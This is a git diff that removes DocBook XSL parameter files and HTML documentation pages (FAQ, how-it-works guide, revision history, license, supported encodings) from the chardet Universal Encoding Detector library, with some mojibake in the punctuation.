a/chardet/docs/docbook/xsl/params/toc.max.depth.xml b/chardet/docs/docbook/xsl/params/toc.max.depth.xml deleted file mode 100644 index d96d026..0000000 --- a/chardet/docs/docbook/xsl/params/toc.max.depth.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -toc.max.depth -integer - - -toc.max.depth -How maximaly deep should be each TOC? - - - -8 - - -Description - -Specifies the maximal depth of TOC on all levels. - - - diff --git a/chardet/docs/docbook/xsl/params/toc.section.depth.xml b/chardet/docs/docbook/xsl/params/toc.section.depth.xml deleted file mode 100644 index 3051219..0000000 --- a/chardet/docs/docbook/xsl/params/toc.section.depth.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -toc.section.depth -integer - - -toc.section.depth -How deep should recursive sections appear -in the TOC? - - - -2 - - -Description - -Specifies the depth to which recursive sections should appear in the -TOC. - - - - diff --git a/chardet/docs/docbook/xsl/params/ulink.footnote.number.format.xml b/chardet/docs/docbook/xsl/params/ulink.footnote.number.format.xml deleted file mode 100644 index 2196c2b..0000000 --- a/chardet/docs/docbook/xsl/params/ulink.footnote.number.format.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -ulink.footnote.number.format -string - - -ulink.footnote.number.format -Identifies the format used for ulink footnote numbers - - - - - - - - -Description - -The ulink.footnote.number.format specifies the format -to use for footnote numeration (1, i, I, a, or A). - - - diff --git a/chardet/docs/docbook/xsl/params/ulink.footnotes.xml b/chardet/docs/docbook/xsl/params/ulink.footnotes.xml deleted file mode 100644 index 9a1ee1c..0000000 --- a/chardet/docs/docbook/xsl/params/ulink.footnotes.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -ulink.footnotes -boolean - - -ulink.footnotes -Generate footnotes for ULinks? - - - - - - - - -Description - -If non-zero, the URL of each ULink will -appear as a footnote. - - - - diff --git a/chardet/docs/docbook/xsl/params/ulink.hyphenate.xml b/chardet/docs/docbook/xsl/params/ulink.hyphenate.xml deleted file mode 100644 index 4c4fc84..0000000 --- a/chardet/docs/docbook/xsl/params/ulink.hyphenate.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -ulink.hyphenate -string - - -ulink.hyphenate -Allow URLs to be automatically hyphenated - - - - - - - - -Description - -If not empty, the specified character (or more generally, content) is -added to URLs after every /. If the character specified is a -Unicode soft hyphen (0x00AD) or Unicode zero-width space (0x200B), some FO -processors will be able to reasonably hyphenate long URLs. - -As of 28 Jan 2002, discretionary hyphens are more widely and correctly -supported than zero-width spaces for this purpose. - - - diff --git a/chardet/docs/docbook/xsl/params/ulink.show.xml b/chardet/docs/docbook/xsl/params/ulink.show.xml deleted file mode 100644 index be6bcc2..0000000 --- a/chardet/docs/docbook/xsl/params/ulink.show.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -ulink.show -boolean - - -ulink.show -Display URLs after ulinks? - - - - - - - - -Description - -If non-zero, the URL of each ULink will -appear after the text of the link. If the text of the link and the URL -are identical, the URL is suppressed. - - - diff --git a/chardet/docs/docbook/xsl/params/ulink.target.xml b/chardet/docs/docbook/xsl/params/ulink.target.xml deleted file mode 100644 index 010effe..0000000 --- a/chardet/docs/docbook/xsl/params/ulink.target.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -ulink.target -string - - -ulink.target -The HTML anchor target for ULinks - - - - - - -Description - -If ulink.target is set, its value will -be used for the target attribute -on anchors generated for ulinks. - - - diff --git a/chardet/docs/docbook/xsl/params/use.embed.for.svg.xml b/chardet/docs/docbook/xsl/params/use.embed.for.svg.xml deleted file mode 100644 index 9b82c60..0000000 --- a/chardet/docs/docbook/xsl/params/use.embed.for.svg.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -use.embed.for.svg -boolean - - -use.embed.for.svg -Use HTML embed for SVG? - - - - - - - - -Description - -If non-zero, an embed element will be created for -SVG figures. An object is always created, -this parameter merely controls whether or not an additional embed -is generated inside the object. - -On the plus side, this may be more portable among browsers and plug-ins. -On the minus side, it isn't valid HTML. - - - diff --git a/chardet/docs/docbook/xsl/params/use.extensions.xml b/chardet/docs/docbook/xsl/params/use.extensions.xml deleted file mode 100644 index 721bf59..0000000 --- a/chardet/docs/docbook/xsl/params/use.extensions.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -use.extensions -boolean - - -use.extensions -Enable extensions - - - - - - -Description - -If non-zero, extensions may be used. Each extension is -further controlled by its own parameter. But if -use.extensions is zero, no extensions will -be used. - - - - diff --git a/chardet/docs/docbook/xsl/params/use.id.as.filename.xml b/chardet/docs/docbook/xsl/params/use.id.as.filename.xml deleted file mode 100644 index 90beb8d..0000000 --- a/chardet/docs/docbook/xsl/params/use.id.as.filename.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -use.id.as.filename -boolean - - -use.id.as.filename -Use ID value of chunk elements as the filename? - - - - - - -Description - -If use.id.as.filename -is non-zero, the filename of chunk elements that have IDs will be -derived from the ID value. - - - - diff --git a/chardet/docs/docbook/xsl/params/use.id.function.xml b/chardet/docs/docbook/xsl/params/use.id.function.xml deleted file mode 100644 index b9ceb58..0000000 --- a/chardet/docs/docbook/xsl/params/use.id.function.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -use.id.function -boolean - - -use.id.function -Use the XPath id() function to find link targets? - - - - - - -Description - -If 1, the stylesheets use the id() function -to find the targets of cross reference elements. This is more -efficient, but only works if your XSLT processor implements the -id() function, naturally. -THIS PARAMETER IS NOT SUPPORTED. IT IS ALWAYS ASSUMED TO BE 1. -SEE xref.xsl IF YOU NEED TO TURN IT OFF. - - - diff --git a/chardet/docs/docbook/xsl/params/use.local.olink.style.xml b/chardet/docs/docbook/xsl/params/use.local.olink.style.xml deleted file mode 100644 index 3b89379..0000000 --- a/chardet/docs/docbook/xsl/params/use.local.olink.style.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -use.local.olink.style -boolean - - -use.local.olink.style -Process olinks using xref style of current -document - - - - - -Description -When cross reference data is collected for use by olinks, the data for each potential target includes one field containing a completely assembled cross reference string, as if it were an xref generated in that document. Other fields record the separate title, number, and element name of each target. When an olink is formed to a target from another document, the olink resolves to that preassembled string by default. If the use.local.olink.style parameter is set to non-zero, then instead the cross -reference string is formed again from the target title, number, and -element name, using the stylesheet processing the targeting document. -Then olinks will match the xref style in the targeting document -rather than in the target document. If both documents are processed -with the same stylesheet, then the results will be the same. - - diff --git a/chardet/docs/docbook/xsl/params/use.role.as.xrefstyle.xml b/chardet/docs/docbook/xsl/params/use.role.as.xrefstyle.xml deleted file mode 100644 index 9f29e95..0000000 --- a/chardet/docs/docbook/xsl/params/use.role.as.xrefstyle.xml +++ /dev/null @@ -1,91 +0,0 @@ - - -use.role.as.xrefstyle -boolean - - -use.role.as.xrefstyle -Use role attribute for -xrefstyle on xref? - - - - - - - - -Description - -If non-zero, the role attribute on -xref will be used to select the cross reference style. -The DocBook -Technical Committee recently added an -xrefstyle attribute for this purpose. -If the xrefstyle attribute -is present, role will be ignored, regardless -of this setting. - -Until an official DocBook release that includes the new -attribute, this flag allows role -to serve that purpose. - - - -Example - -The following small stylesheet shows how to configure the stylesheets to make -use of the cross reference style: - - - - - - - - - - - - - - - - - - -]]> - -With this stylesheet, the cross references in the following document: - - - -Book - - -Preface - -Normal: . -Title: . - - - - -First Chapter - -Irrelevant. - - -]]> - -will appear as: - - -Normal: Chapter 1. -Title: Chapter 1, First Chapter. - - - - diff --git a/chardet/docs/docbook/xsl/params/use.role.for.mediaobject.xml b/chardet/docs/docbook/xsl/params/use.role.for.mediaobject.xml deleted file mode 100644 index d78df18..0000000 --- a/chardet/docs/docbook/xsl/params/use.role.for.mediaobject.xml +++ /dev/null @@ -1,51 +0,0 @@ - - -use.role.for.mediaobject -boolean - - -use.role.for.mediaobject -Use role attribute -value for selecting which of several objects within a mediaobject to use. - - - - - - - - - -Description - -If non-zero, the role attribute on -imageobjects or other objects within a mediaobject container will be used to select which object will be -used. - - -The order of selection when then parameter is non-zero is: - - - - If the stylesheet parameter preferred.mediaobject.role has a value, then the object whose role equals that value is selected. - - -Else if an object's role attribute has a value of -html for HTML processing or -fo for FO output, then the first -of such objects is selected. - - - -Else the first suitable object is selected. - - - -If the value of -use.role.for.mediaobject -is zero, then role attributes are not considered -and the first suitable object -with or without a role value is used. - - - diff --git a/chardet/docs/docbook/xsl/params/use.svg.xml b/chardet/docs/docbook/xsl/params/use.svg.xml deleted file mode 100644 index 041d1ad..0000000 --- a/chardet/docs/docbook/xsl/params/use.svg.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -use.svg -boolean - - -use.svg -Allow SVG in the result tree? - - - - - - - - -Description - -If non-zero, SVG will be considered an acceptable image format. SVG -is passed through to the result tree, so correct rendering of the resulting -diagram depends on the formatter (FO processor or web browser) that is used -to process the output from the stylesheet. - - - diff --git a/chardet/docs/docbook/xsl/params/variablelist.as.blocks.xml b/chardet/docs/docbook/xsl/params/variablelist.as.blocks.xml deleted file mode 100644 index 017e166..0000000 --- a/chardet/docs/docbook/xsl/params/variablelist.as.blocks.xml +++ /dev/null @@ -1,44 +0,0 @@ - - -variablelist.as.blocks -boolean - - -variablelist.as.blocks -Format variablelists lists as blocks? - - - - - - - - -Description - -If non-zero, variablelists will be formatted as -blocks. - -If you have long terms, proper list markup in the FO case may produce -unattractive lists. By setting this parameter, you can force the stylesheets -to produce block markup instead of proper lists. - -You can override this setting with a processing instruction as the -child of variablelist: dbfo -list-presentation="blocks" or dbfo -list-presentation="list" - - - - - list - - - Formatted as a list even if variablelist.as.blocks is set to 1. - - - - ]]> - - - diff --git a/chardet/docs/docbook/xsl/params/variablelist.as.table.xml b/chardet/docs/docbook/xsl/params/variablelist.as.table.xml deleted file mode 100644 index 92eb57f..0000000 --- a/chardet/docs/docbook/xsl/params/variablelist.as.table.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -variablelist.as.table -boolean - - -variablelist.as.table -Format variablelists as tables? - - - - - - - - -Description - -If non-zero, variablelists will be formatted as -tables. - -This parameter only applys to the HTML transformations. In the -FO case, proper list markup is robust enough to handle the formatting. -But see also variablelist.as.blocks. - - - diff --git a/chardet/docs/docbook/xsl/params/variablelist.max.termlength.xml b/chardet/docs/docbook/xsl/params/variablelist.max.termlength.xml deleted file mode 100644 index 8cad72d..0000000 --- a/chardet/docs/docbook/xsl/params/variablelist.max.termlength.xml +++ /dev/null @@ -1,41 +0,0 @@ - - -variablelist.max.termlength - - - -variablelist.max.termlength -Specifies the longest term in variablelists - - - - -24 - - - -Description - -In variablelists, the listitem -is indented to leave room for the -term elements. That indent may be computed -if it is not specified with a termlength -attribute on the variablelist element. - - -The computation counts characters in the -term elements in the list -to find the longest term. However, some terms are very long -and would produce extreme indents. This parameter lets you -set a maximum character count. Any terms longer than the maximum -would line wrap. The default value is 24. - - -The character counts are converted to physical widths -by multiplying by 0.50em. There will be some variability -in how many actual characters fit in the space -since some characters are wider than others. - - - - diff --git a/chardet/docs/docbook/xsl/params/verbatim.properties.xml b/chardet/docs/docbook/xsl/params/verbatim.properties.xml deleted file mode 100644 index 628b1f3..0000000 --- a/chardet/docs/docbook/xsl/params/verbatim.properties.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -verbatim.properties -Properties associated with verbatim text - - - - - - 0.8em - 1em - 1.2em - 0.8em - 1em - 1.2em - - - -Description -This attribute set is used on all verbatim environments. - - - diff --git a/chardet/docs/docbook/xsl/params/xep.extensions.xml b/chardet/docs/docbook/xsl/params/xep.extensions.xml deleted file mode 100644 index c33fe17..0000000 --- a/chardet/docs/docbook/xsl/params/xep.extensions.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -xep.extensions -boolean - - -xep.extensions -Enable XEP extensions? - - - - - - -Description - -If non-zero, -XEP -extensions will be used. XEP extensions consists of PDF bookmarks, -document information and better index processing. - - - - diff --git a/chardet/docs/docbook/xsl/params/xep.index.item.properties.xml b/chardet/docs/docbook/xsl/params/xep.index.item.properties.xml deleted file mode 100644 index 460daf5..0000000 --- a/chardet/docs/docbook/xsl/params/xep.index.item.properties.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -xep.index.item.properties -Properties associated with XEP index-items - - - - - - true - true - - - - -Description - -Properties associated with XEP index-items. For more info see -the section "Indexes" in -. - - - diff --git a/chardet/docs/docbook/xsl/params/xref.label-page.separator.xml b/chardet/docs/docbook/xsl/params/xref.label-page.separator.xml deleted file mode 100644 index a544002..0000000 --- a/chardet/docs/docbook/xsl/params/xref.label-page.separator.xml +++ /dev/null @@ -1,33 +0,0 @@ - - -xref.label-page.separator -string - - -xref.label-page.separator -Punctuation or space separating label from page number in xref - - - - - - -Description - - -This parameter allows you to control the punctuation of certain -types of generated cross reference text. -When cross reference text is generated for an -xref or -olink element -using an xrefstyle attribute -that makes use of the select: feature, -and the selected components include both label and page -but no title, -then the value of this parameter is inserted between -label and page number in the output. -If a title is included, then other separators are used. - - - - diff --git a/chardet/docs/docbook/xsl/params/xref.label-title.separator.xml b/chardet/docs/docbook/xsl/params/xref.label-title.separator.xml deleted file mode 100644 index 7e21c25..0000000 --- a/chardet/docs/docbook/xsl/params/xref.label-title.separator.xml +++ /dev/null @@ -1,31 +0,0 @@ - - -xref.label-title.separator -string - - -xref.label-title.separator -Punctuation or space separating label from title in xref - - - -: - - -Description - - -This parameter allows you to control the punctuation of certain -types of generated cross reference text. -When cross reference text is generated for an -xref or -olink element -using an xrefstyle attribute -that makes use of the select: feature, -and the selected components include both label and title, -then the value of this parameter is inserted between -label and title in the output. - - - - diff --git a/chardet/docs/docbook/xsl/params/xref.properties.xml b/chardet/docs/docbook/xsl/params/xref.properties.xml deleted file mode 100644 index 9212c57..0000000 --- a/chardet/docs/docbook/xsl/params/xref.properties.xml +++ /dev/null @@ -1,19 +0,0 @@ - - -xref.properties -Properties associated with cross-reference text - - - - - - - - - -Description - -This attribute set is used on cross reference text. - - - diff --git a/chardet/docs/docbook/xsl/params/xref.title-page.separator.xml b/chardet/docs/docbook/xsl/params/xref.title-page.separator.xml deleted file mode 100644 index c38ebb4..0000000 --- a/chardet/docs/docbook/xsl/params/xref.title-page.separator.xml +++ /dev/null @@ -1,31 +0,0 @@ - - -xref.title-page.separator -string - - -xref.title-page.separator -Punctuation or space separating title from page number in xref - - - - - - -Description - - -This parameter allows you to control the punctuation of certain -types of generated cross reference text. -When cross reference text is generated for an -xref or -olink element -using an xrefstyle attribute -that makes use of the select: feature, -and the selected components include both title and page number, -then the value of this parameter is inserted between -title and page number in the output. - - - - diff --git a/chardet/docs/docbook/xsl/params/xref.with.number.and.title.xml b/chardet/docs/docbook/xsl/params/xref.with.number.and.title.xml deleted file mode 100644 index 0656835..0000000 --- a/chardet/docs/docbook/xsl/params/xref.with.number.and.title.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -xref.with.number.and.title -boolean - - -xref.with.number.and.title -Use number and title in cross references - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/faq.html b/chardet/docs/faq.html deleted file mode 100644 index 7216062..0000000 --- a/chardet/docs/faq.html +++ /dev/null @@ -1,94 +0,0 @@ - - - - -Frequently asked questions [Universal Encoding Detector] - - - - - - - - - - -
    - -
    -
    -

    - Frequently asked questions

    -
    -
    -
    -
    -

    - What is character encoding?

    -
    -
    -

    When you think of ג€textג€, you probably think of ג€characters and symbols I see on my computer screenג€. But computers don't deal in characters and symbols; they deal in bits and bytes. Every piece of text you've ever seen on a computer screen is actually stored in a particular character encoding. There are many different character encodings, some optimized for particular languages like Russian or Chinese or English, and others that can be used for multiple languages. Very roughly speaking, the character encoding provides a mapping between the stuff you see on your screen and the stuff your computer actually stores in memory and on disk.

    -

    In reality, it's more complicated than that. Many characters are common to multiple encodings, but each encoding may use a different sequence of bytes to actually store those characters in memory or on disk. So you can think of the character encoding as a kind of decryption key for the text. Whenever someone gives you a sequence of bytes and claims it's ג€textג€, you need to know what character encoding they used so you can decode the bytes into characters and display them (or process them, or whatever).

    -
    -
    -
    -

    - What is character encoding auto-detection?

    -
    -
    -

    It means taking a sequence of bytes in an unknown character encoding, and attempting to determine the encoding so you can read the text. It's like cracking a code when you don't have the decryption key.

    -
    -
    -
    -

    - Isn't that impossible?

    -
    -
    -

    In general, yes. However, some encodings are optimized for specific languages, and languages are not random. Some character sequences pop up all the time, while other sequences make no sense. A person fluent in English who opens a newspaper and finds ג€txzqJv 2!dasd0a QqdKjvzג€ will instantly recognize that that isn't English (even though it is composed entirely of English letters). By studying lots of ג€typicalג€ text, a computer algorithm can simulate this kind of fluency and make an educated guess about a text's language.

    -

    In other words, encoding detection is really language detection, combined with knowledge of which languages tend to use which character encodings.

    -
    -
    -
    -

    - Who wrote this detection algorithm?

    -
    -
    -

    This library is a port of the auto-detection code in Mozilla. I have attempted to maintain as much of the original structure as possible (mostly for selfish reasons, to make it easier to maintain the port as the original code evolves). I have also retained the original authors' comments, which are quite extensive and informative.

    -

    You may also be interested in the research paper which led to the Mozilla implementation, A composite approach to language/encoding detection.

    -
    -
    -
    -

    - Yippie! Screw the standards, I'll just auto-detect everything!

    -
    -
    -

    Don't do that. Virtually every format and protocol contains a method for specifying character encoding.

    -
      -
    • HTTP can define a charset parameter in the Content-type header.
    • -
    • HTML documents can define a <meta http-equiv="content-type"> element in the <head> of a web page.
    • -
    • XML documents can define an encoding attribute in the XML prolog.
    • -
    -

    If text comes with explicit character encoding information, you should use it. If the text has no explicit information, but the relevant standard defines a default encoding, you should use that. (This is harder than it sounds, because standards can overlap. If you fetch an XML document over HTTP, you need to support both standards and figure out which one wins if they give you conflicting information.)

    -

    Despite the complexity, it's worthwhile to follow standards and respect explicit character encoding information. It will almost certainly be faster and more accurate than trying to auto-detect the encoding. It will also make the world a better place, since your program will interoperate with other programs that follow the same standards.

    -
    -
    -
    -

    - Why bother with auto-detection if it's slow, inaccurate, and non-standard?

    -
    -
    -

    Sometimes you receive text with verifiably inaccurate encoding information. Or text without any encoding information, and the specified default encoding doesn't work. There are also some poorly designed standards that have no way to specify encoding at all.

    -

    If following the relevant standards gets you nowhere, and you decide that processing the text is more important than maintaining interoperability, then you can try to auto-detect the character encoding as a last resort. An example is my Universal Feed Parser, which calls this auto-detection library only after exhausting all other options.

    -
    -
    -
    -
    -
    ג†ֲ Documentation -
    -
    -Supported encodingsֲ ג†’
    -
    -
    - - - diff --git a/chardet/docs/history.html b/chardet/docs/history.html deleted file mode 100644 index ac410bb..0000000 --- a/chardet/docs/history.html +++ /dev/null @@ -1,52 +0,0 @@ - - - - -Revision history [Universal Encoding Detector] - - - - - - - - - - -
    - -
    -
    -
    -

    - Revision history

    -
    -

    -

    Universal Encoding Detector is currently at version 1.0.1.

    -
    -
    -
    -
    -
    -
    1.0.1 (2008-03-05)
    -
      -
    • fixed typo in detecting little endian UTF-16; closes issue 81 -
    • -
    • fixed length of ISO2022JPCharLenTable; closes issue 98 -
    • -
    -
    1.0 (2006-01-10)
    -
    • Initial release
    -
    -
    -
    -
    -
    ג†ֲ How it works -
    -
    -Terms of useֲ ג†’
    -
    -
    - - - diff --git a/chardet/docs/how-it-works.html b/chardet/docs/how-it-works.html deleted file mode 100644 index 9c934bb..0000000 --- a/chardet/docs/how-it-works.html +++ /dev/null @@ -1,101 +0,0 @@ - - - - -How it works [Universal Encoding Detector] - - - - - - - - - - -
    - -
    -
    -
    -

    - How it works

    -
    -

    -

    This is a brief guide to navigating the code itself.

    -
    -
    -
    -
    -

    First, you should read A composite approach to language/encoding detection, which explains the detection algorithm and how it was derived. This will help you later when you stumble across the huge character frequency distribution tables like big5freq.py and language models like langcyrillicmodel.py.

    -

    The main entry point for the detection algorithm is universaldetector.py, which has one class, UniversalDetector. (You might think the main entry point is the detect function in chardet/__init__.py, but that's really just a convenience function that creates a UniversalDetector object, calls it, and returns its result.)

    -

    There are 5 categories of encodings that UniversalDetector handles:

    -
      -
    1. -UTF-n with a BOM. This includes UTF-8, both BE and LE variants of UTF-16, and all 4 byte-order variants of UTF-32.
    2. -
    3. Escaped encodings, which are entirely 7-bit ASCII compatible, where non-ASCII characters start with an escape sequence. Examples: ISO-2022-JP (Japanese) and HZ-GB-2312 (Chinese).
    4. -
    5. Multi-byte encodings, where each character is represented by a variable number of bytes. Examples: Big5 (Chinese), SHIFT_JIS (Japanese), EUC-KR (Korean), and UTF-8 without a BOM.
    6. -
    7. Single-byte encodings, where each character is represented by one byte. Examples: KOI8-R (Russian), windows-1255 (Hebrew), and TIS-620 (Thai).
    8. -
    9. -windows-1252, which is used primarily on Microsoft Windows by middle managers who don't know a character encoding from a hole in the ground.
    10. -
    -
    -
    -

    - UTF-n with a BOM -

    -
    -
    -

    If the text starts with a BOM, we can reasonably assume that the text is encoded in UTF-8, UTF-16, or UTF-32. (The BOM will tell us exactly which one; that's what it's for.) This is handled inline in UniversalDetector, which returns the result immediately without any further processing.

    -
    -
    -
    -

    - Escaped encodings

    -
    -
    -

    If the text contains a recognizable escape sequence that might indicate an escaped encoding, UniversalDetector creates an EscCharSetProber (defined in escprober.py) and feeds it the text.

    -

    EscCharSetProber creates a series of state machines, based on models of HZ-GB-2312, ISO-2022-CN, ISO-2022-JP, and ISO-2022-KR (defined in escsm.py). EscCharSetProber feeds the text to each of these state machines, one byte at a time. If any state machine ends up uniquely identifying the encoding, EscCharSetProber immediately returns the positive result to UniversalDetector, which returns it to the caller. If any state machine hits an illegal sequence, it is dropped and processing continues with the other state machines.

    -
    -
    -
    -

    - Multi-byte encodings

    -
    -
    -

    Assuming no BOM, UniversalDetector checks whether the text contains any high-bit characters. If so, it creates a series of ג€probersג€ for detecting multi-byte encodings, single-byte encodings, and as a last resort, windows-1252.

    -

    The multi-byte encoding prober, MBCSGroupProber (defined in mbcsgroupprober.py), is really just a shell that manages a group of other probers, one for each multi-byte encoding: Big5, GB2312, EUC-TW, EUC-KR, EUC-JP, SHIFT_JIS, and UTF-8. MBCSGroupProber feeds the text to each of these encoding-specific probers and checks the results. If a prober reports that it has found an illegal byte sequence, it is dropped from further processing (so that, for instance, any subsequent calls to UniversalDetector.feed will skip that prober). If a prober reports that it is reasonably confident that it has detected the encoding, MBCSGroupProber reports this positive result to UniversalDetector, which reports the result to the caller.

    -

    Most of the multi-byte encoding probers are inherited from MultiByteCharSetProber (defined in mbcharsetprober.py), and simply hook up the appropriate state machine and distribution analyzer and let MultiByteCharSetProber do the rest of the work. MultiByteCharSetProber runs the text through the encoding-specific state machine, one byte at a time, to look for byte sequences that would indicate a conclusive positive or negative result. At the same time, MultiByteCharSetProber feeds the text to an encoding-specific distribution analyzer.

    -

    The distribution analyzers (each defined in chardistribution.py) use language-specific models of which characters are used most frequently. Once MultiByteCharSetProber has fed enough text to the distribution analyzer, it calculates a confidence rating based on the number of frequently-used characters, the total number of characters, and a language-specific distribution ratio. If the confidence is high enough, MultiByteCharSetProber returns the result to MBCSGroupProber, which returns it to UniversalDetector, which returns it to the caller.

    -

    The case of Japanese is more difficult. Single-character distribution analysis is not always sufficient to distinguish between EUC-JP and SHIFT_JIS, so the SJISProber (defined in sjisprober.py) also uses 2-character distribution analysis. SJISContextAnalysis and EUCJPContextAnalysis (both defined in jpcntx.py and both inheriting from a common JapaneseContextAnalysis class) check the frequency of Hiragana syllabary characters within the text. Once enough text has been processed, they return a confidence level to SJISProber, which checks both analyzers and returns the higher confidence level to MBCSGroupProber.

    -
    -
    -
    -

    - Single-byte encodings

    -
    -
    -

    The single-byte encoding prober, SBCSGroupProber (defined in sbcsgroupprober.py), is also just a shell that manages a group of other probers, one for each combination of single-byte encoding and language: windows-1251, KOI8-R, ISO-8859-5, MacCyrillic, IBM855, and IBM866 (Russian); ISO-8859-7 and windows-1253 (Greek); ISO-8859-5 and windows-1251 (Bulgarian); ISO-8859-2 and windows-1250 (Hungarian); TIS-620 (Thai); windows-1255 and ISO-8859-8 (Hebrew).

    -

    SBCSGroupProber feeds the text to each of these encoding+language-specific probers and checks the results. These probers are all implemented as a single class, SingleByteCharSetProber (defined in sbcharsetprober.py), which takes a language model as an argument. The language model defines how frequently different 2-character sequences appear in typical text. SingleByteCharSetProber processes the text and tallies the most frequently used 2-character sequences. Once enough text has been processed, it calculates a confidence level based on the number of frequently-used sequences, the total number of characters, and a language-specific distribution ratio.

    -

    Hebrew is handled as a special case. If the text appears to be Hebrew based on 2-character distribution analysis, HebrewProber (defined in hebrewprober.py) tries to distinguish between Visual Hebrew (where the source text actually stored ג€backwardsג€ line-by-line, and then displayed verbatim so it can be read from right to left) and Logical Hebrew (where the source text is stored in reading order and then rendered right-to-left by the client). Because certain characters are encoded differently based on whether they appear in the middle of or at the end of a word, we can make a reasonable guess about direction of the source text, and return the appropriate encoding (windows-1255 for Logical Hebrew, or ISO-8859-8 for Visual Hebrew).

    -
    -
    -
    -

    - windows-1252

    -
    -
    -

    If UniversalDetector detects a high-bit character in the text, but none of the other multi-byte or single-byte encoding probers return a confident result, it creates a Latin1Prober (defined in latin1prober.py) to try to detect English text in a windows-1252 encoding. This detection is inherently unreliable, because English letters are encoded in the same way in many different encodings. The only way to distinguish windows-1252 is through commonly used symbols like smart quotes, curly apostrophes, copyright symbols, and the like. Latin1Prober automatically reduces its confidence rating to allow more accurate probers to win if at all possible.

    -
    -
    -
    -
    -
    ג†ֲ Usage -
    -
    -Revision historyֲ ג†’
    -
    -
    - - - diff --git a/chardet/docs/images/caution.png b/chardet/docs/images/caution.png deleted file mode 100644 index 5b7809c..0000000 Binary files a/chardet/docs/images/caution.png and /dev/null differ diff --git a/chardet/docs/images/important.png b/chardet/docs/images/important.png deleted file mode 100644 index fc1db35..0000000 Binary files a/chardet/docs/images/important.png and /dev/null differ diff --git a/chardet/docs/images/note.png b/chardet/docs/images/note.png deleted file mode 100644 index d0c3c64..0000000 Binary files a/chardet/docs/images/note.png and /dev/null differ diff --git a/chardet/docs/images/permalink.gif b/chardet/docs/images/permalink.gif deleted file mode 100644 index b843ea8..0000000 Binary files a/chardet/docs/images/permalink.gif and /dev/null differ diff --git a/chardet/docs/images/tip.png b/chardet/docs/images/tip.png deleted file mode 100644 index 5c4aab3..0000000 Binary files a/chardet/docs/images/tip.png and /dev/null differ diff --git a/chardet/docs/images/warning.png b/chardet/docs/images/warning.png deleted file mode 100644 index 1c33db8..0000000 Binary files a/chardet/docs/images/warning.png and /dev/null differ diff --git a/chardet/docs/index.html b/chardet/docs/index.html deleted file mode 100644 index 03c314a..0000000 --- a/chardet/docs/index.html +++ /dev/null @@ -1,61 +0,0 @@ - - - - -Documentation [Universal Encoding Detector] - - - - - - - - - -
    -
    - -
    -
    - - - diff --git a/chardet/docs/license.html b/chardet/docs/license.html deleted file mode 100644 index 4246274..0000000 --- a/chardet/docs/license.html +++ /dev/null @@ -1,49 +0,0 @@ - - - - -Terms of use [Universal Encoding Detector] - - - - - - - - - -
    - -
    -
    -

    - Terms of use

    -
    -
    -

    - Software

    -

    The Universal Encoding Detector library is copyright ֲ© 2006-2008 Mark Pilgrim. All rights reserved.

    -

    Portions copyright ֲ© 1998-2001 Netscape Communications Corporation. All rights reserved.

    -

    The Universal Encoding Detector library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version.

    -

    This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.

    -

    You should have received a copy of the GNU Lesser General Public License along with this library (in a file named COPYING); if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA

    -

    - Documentation

    -

    The Universal Encoding Detector documentation is copyright ֲ© 2006-2008 Mark Pilgrim. All rights reserved.

    -

    Redistribution and use in source (XML DocBook) and ג€compiledג€ forms (SGML, HTML, PDF, PostScript, RTF and so forth) with or without modification, are permitted provided that the following conditions are met:

    -
      -
    1. Redistributions of source code (XML DocBook) must retain the above copyright notice, this list of conditions and the following disclaimer unmodified.
    2. -
    3. Redistributions in compiled form (transformed to other DTDs, converted to PDF, PostScript, RTF and other formats) must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
    4. -
    -

    THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR ג€AS ISג€ AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

    -
    -
    -
    -
    ג†ֲ Revision history -
    -
    -
    -
    - - - diff --git a/chardet/docs/supported-encodings.html b/chardet/docs/supported-encodings.html deleted file mode 100644 index 19bbe54..0000000 --- a/chardet/docs/supported-encodings.html +++ /dev/null @@ -1,73 +0,0 @@ - - - - -Supported encodings [Universal Encoding Detector] - - - - - - - - - - -
    - -
    -
    -
    -

    - Supported encodings

    -
    -

    -

    Universal Encoding Detector currently supports over two dozen character encodings.

    -
    -
    -
    -
    -
      -
    • -Big5, GB2312/GB18030, EUC-TW, HZ-GB-2312, and ISO-2022-CN (Traditional and Simplified Chinese)
    • -
